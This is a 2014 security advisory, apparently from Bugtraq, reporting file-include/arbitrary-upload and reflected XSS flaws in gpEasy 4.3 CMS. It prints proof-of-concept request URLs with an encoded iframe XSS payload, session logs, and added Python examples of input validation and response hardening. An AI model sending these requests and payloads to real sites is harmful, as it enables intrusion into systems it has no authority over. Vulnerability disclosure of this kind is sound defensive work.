gpEasy v4.3.x CMS - Multiple Web Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx
- Subject: gpEasy v4.3.x CMS - Multiple Web Vulnerabilities
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Fri, 07 Feb 2014 12:31:17 +0100
Document Title:
===============
gpEasy v4.3.x CMS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1189
Release Date:
=============
2014-02-06
Vulnerability Laboratory ID (VL-ID):
====================================
1189
Common Vulnerability Scoring System:
====================================
6.1
Product & Service Introduction:
===============================
gpEasy 4.3 is a complete content management system that lets users create rich
and flexible Web sites with a simple and easy-to-use interface.
The embedded design of the admin interface allows users to instantly see
changes in a single browser window. gpEasy has many qualities,
but if we had to pick three adjectives to describe our CMS, it would have to be
fast, easy and free. These three small words represent
big ideas for us and embody the principles that drive gpEasy development.
(Copy of the Vendor Homepage: http://www.gpeasy.com/Fast_Easy_and_Free )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web
vulnerabilities in the official gpEasy v4.3 content management system.
Vulnerability Disclosure Timeline:
==================================
2013-02-06: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
gpEasy
Product: gpEasy Content Management System (Web Application) 4.3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A file include and arbitrary file upload web vulnerability has been discovered
in the official gpEasy v4.3 content management system.
The local file include web vulnerability allows remote attackers to include
local files or paths, or system-specific path commands, without authorization
and thereby compromise the web application. The arbitrary file upload issue
allows remote attackers to upload files with multiple extensions to bypass the
web server or system validation.
The vulnerability is located in the `file- and folder` name values of the
`upload files` module. Attackers can tamper with the POST request to upload
their own malicious script code or web shells. The validation also has no
filter mechanism for multiple file extensions, which can result in a prepared
combined attack to include a file and upload/execute arbitrary code. The
security risk of the local and remote vulnerability is estimated as high with
a CVSS (Common Vulnerability Scoring System) count of 6.1(-).
Exploitation of the local file include and arbitrary file upload web
vulnerability requires no user interaction but a privileged web application
user account. Successful exploitation of the local web vulnerability results in
application or DBMS compromise by combined LFI/AFU web attacks.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Home > Administration > Uploaded Files
Vulnerable Parameter(s):
[+] file- and folder name
Vulnerable Module(s):
[+] Upload File Manager
1.2
Multiple client-side cross site scripting web vulnerabilities have been
discovered in the official gpEasy v4.3 content management system.
A non-persistent cross site scripting vulnerability allows remote attackers to
manipulate client-side browser requests through the affected web application.
The vulnerability is located in the `mount network volume` function of the
`content > upload files` module. The vulnerable input field values are
`host`, `port`, `path`, `user` and `pass`. Remote attackers can manipulate the
GET request of the `mount network volume` function to provoke a wrongly
encoded exception, which executes the injected script code. The code executes
in the invalid error message exception of the mount network volume function.
The security risk of the remote XSS web vulnerability is estimated as medium
with a CVSS (Common Vulnerability Scoring System) count of 2.9(+).
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Home > Administration > Uploaded Files > Mount Network Volume
Vulnerable Parameter(s):
[+] host
[+] port
[+] path
[+] user
[+] pass
Affected Module(s):
[+] Error invalid Content Exception
Proof of Concept (PoC):
=======================
1.1
The file include and arbitrary file upload web vulnerability can be exploited
by a local attacker with a privileged user account and without user interaction.
For security demonstration or to reproduce the vulnerability, follow the
provided steps and information below.
PoC:
<div style="height: 746px;" class="finder-cwd-wrapper"><div style="height:
744px;" unselectable="on"
class="ui-helper-clearfix finder-cwd ui-selectable ui-droppable
finder-cwd-view-icons"><div id="tmp_57646"
class="finder-cwd-file directory ui-corner-all finder-cwd-file-tmp ui-selectee
ui-state-disabled" title="Today 17:0">
<div class="finder-cwd-file-wrapper ui-corner-all"><div class="finder-cwd-icon
finder-cwd-icon-directory ui-corner-all"
unselectable="on"></div></div><div class="finder-cwd-filename" title="untitled
folder">>"<[FILE INCLUDE VULNERABILITY VIA PATH]</div></div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
GET
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=mkdir&name=[FILE
INCLUE VULNERABILITY!+]&target=[#PENG!]l1_Lw&_=1391616013488 Load
Flags[LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[demo-31ca1a14f3ab75.gpeasy.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://demo-31ca1a14f3ab75.gpeasy.com/Admin_Uploaded]
Cookie[demo-31ca1a14f3ab75=eab8166b0a152ac27b9c0136a5e45478d1c5dff8a499c6265ec407d655526762b9845a1a;
gpEasy_53ef13dc235a=4CPb4xGrLOKfN2YR0O8HdxJqnzVUqNrck5PwFKfQ]
Connection[keep-alive]
Response Header:
Date[Wed, 05 Feb 2014 16:00:26 GMT]
Server[Apache/2.2.24 (Unix)]
X-Powered-By[PHP/5.3.3]
Expires[Wed, 5 Feb 2014 16:00:26 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0,
pre-check=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
Content-Encoding[gzip]
Vary[Accept-Encoding]
Last-Modified[Wed, 05 Feb 2014 16:00:26 GMT]
Connection[close]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=utf-8]
1.2
The cross site scripting web vulnerability can be exploited by remote attackers
without a privileged user account and with medium or high user interaction.
For security demonstration or to reproduce the vulnerability, follow the
provided steps and information below.
Example PoC:
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=netmount&protocol=ftp&host=%22[CLIENT-SIDE
INJECTED SCRIPT CODE!]%3E&port=%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E
&path=%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E&user=%22[CLIENT-SIDE INJECTED
SCRIPT CODE!]%3E&pass=%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E&_=1391619422697
PoC:
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=netmount&protocol=ftp&host=%22%3E%3Ciframe+src%3Da%3E&port=%22%3E%3Ciframe+src%3Da%3E
&path=%2F%22%3E%3Ciframe+src%3Da%3E&user=%22%3E%3Ciframe+src%3Da%3E&pass=%22%3E%3Ciframe+src%3Da%3E&_=1391619422697
PoC: Source Admin_Finder? - Exception
<html><head></head><body>{"error":["errNetMount","\"><%22[CLIENT-SIDE INJECTED
SCRIPT CODE!]%3E">",
"Unable to connect to FTP server \"><%22[CLIENT-SIDE INJECTED SCRIPT
CODE!]%3E>"],"debug":{"connector":"php","phpver":"5.3.3","time":0.25530505180359,
"memory":"7415Kb \/ 7365Kb \/
128M","upload":"","volumes":[{"id":"l1_","name":"localfilesystem","imgLib":"gd"}],"mountErrors":[]}}</iframe></body></html>
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=netmount&protocol=ftp&host=%22%3E%3Ciframe+src%3Da%3E&port=%22%3E%3Ciframe+src%3Da%3E&path=%2F%22%3E%3Ciframe+src%3Da%3E&user=%22%3E%3Ciframe+src%3Da%3E&pass=%22%3E%3Ciframe+src%3Da%3E&_=1391619422697
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[demo-31ca1a14f3ab75.gpeasy.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://demo-31ca1a14f3ab75.gpeasy.com/Admin_Uploaded]
Cookie[demo-31ca1a14f3ab75=eab8166b0a152ac27b9c0136a5e45478d1c5dff8a499c6265ec407d655526762b9845a1a;
gpEasy_53ef13dc235a=4CPb4xGrLOKfN2YR0O8HdxJqnzVUqNrck5PwFKfQ]
Connection[keep-alive]
Response Header:
Date[Wed, 05 Feb 2014 16:57:15 GMT]
Server[Apache/2.2.24 (Unix)]
X-Powered-By[PHP/5.3.3]
Expires[Wed, 5 Feb 2014 16:57:15 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0,
pre-check=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
Content-Encoding[gzip]
Vary[Accept-Encoding]
Last-Modified[Wed, 05 Feb 2014 16:57:15 GMT]
Connection[close]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=utf-8]
Solution - Fix & Patch:
=======================
1.1
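Added example, not the advisory's text or gpEasy's code: a server-side check of the `name` value sent by upload and mkdir requests that rejects the shapes described in 1.1 (path components, multiple extensions, non-allowlisted types). The function name and the extension allowlist are assumptions chosen for illustration.

```python
import re

# Constructed allowlist for the illustration; a deployment chooses its own.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "zip"}

# Letters, digits, space, dot, underscore and hyphen only: this alone excludes
# path separators, NUL and control bytes, and the quote/angle characters that
# appear in the advisory's folder-name PoC.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9 ._-]+$")

def validate_upload_name(name, is_folder=False):
    """Hypothetical server-side check for the 'name' value of an upload or
    mkdir request. Returns (accepted, reason)."""
    if not name or len(name) > 128:
        return False, "empty or too long"
    if name in (".", ".."):
        return False, "dot-directory name"
    if "/" in name or "\\" in name or "\x00" in name:
        # Checked before the regex so the reason is specific.
        return False, "path separator or NUL byte"
    if not _SAFE_NAME.match(name):
        return False, "character outside the allowed set"
    if name.startswith(".") or name.endswith((".", " ")):
        # Blocks dotfiles such as .htaccess and names the OS may normalise.
        return False, "leading dot or trailing dot/space"
    parts = name.split(".")
    if is_folder:
        if len(parts) > 1:
            return False, "folder names may not carry an extension"
        return True, "ok"
    if len(parts) != 2:
        # 'shell.php.jpg' carries two extensions; 'README' carries none.
        return False, "exactly one extension required"
    ext = parts[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not in allowlist: " + ext
    return True, "ok"
```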
1.2
The second vulnerability can be patched by securely parsing the output of the
invalid context exception handler.
Parse and filter the input fields of the GET request, i.e. the vulnerable host,
path, pass, user and port parameters.
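Added example, not the advisory's or gpEasy's code, written in Python to illustrate the fix for 1.2: the error document in the PoC is JSON served as text/html with the parameter value copied in verbatim, so a browser rendering it builds the injected element. The hardened variant returns a correct content type, disables MIME sniffing and hex-escapes tag delimiters inside the JSON, so the consumer still receives the real value while the wire form contains no tags. The function names and the PoC value (decoded from the advisory's %22%3E%3Ciframe+src%3Da%3E) are assumptions for the illustration.

```python
import json

# Constructed input: the decoded form of the advisory's PoC parameter value
# %22%3E%3Ciframe+src%3Da%3E, i.e. a closing quote, a closing bracket and a tag.
POC_VALUE = '"><iframe src=a>'

def error_payload(host):
    # Same structure as the observed connector response: the host value is
    # copied verbatim into the error list.
    return {"error": ["errNetMount", host,
                      "Unable to connect to FTP server " + host]}

def vulnerable_error_response(host):
    """Reproduces the observed behaviour: json.dumps escapes the quote but
    leaves < and > literal, and the body is labelled text/html, so a browser
    that renders it directly will build the injected element."""
    headers = {"Content-Type": "text/html; charset=utf-8"}
    return headers, json.dumps(error_payload(host))

def json_for_html_context(obj):
    """Serialise to JSON and hex-escape HTML-significant characters. The JSON
    decodes to the same strings, but the wire form contains no tag
    delimiters, so it stays inert even if it is ever rendered as HTML."""
    return (json.dumps(obj, ensure_ascii=True)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))

def hardened_error_response(host):
    """The same error reported with a correct content type, no MIME sniffing
    and a tag-free body; the XHR consumer still receives the real values."""
    headers = {"Content-Type": "application/json; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    return headers, json_for_html_context(error_payload(host))

def decode_error(body):
    # Consumer side: the list the JavaScript client would see after JSON.parse.
    return json.loads(body)["error"]

if __name__ == "__main__":
    print("vulnerable body:", vulnerable_error_response(POC_VALUE)[1])
    print("hardened body:  ", hardened_error_response(POC_VALUE)[1])
```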
Security Risk:
==============
1.1
The security risk of the local file include and arbitrary file upload web
vulnerability is estimated as high(-).
1.2
The security risk of the client-side cross site scripting web vulnerabilities
is estimated as medium(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any
warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
fitness for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor
licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx - research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partial usage, of this file
requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
pictures, texts, advisories, source code, videos and
other information on this website are trademarks of the vulnerability-lab team
and the specific authors or managers. To record, list (feed),
modify, use or edit our material, contact (admin@xxxxxxxxxxxxxxxxxxxxx or
research@xxxxxxxxxxxxxxxxxxxxx) to obtain permission.
Copyright © 2014 | Vulnerability Laboratory
[Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx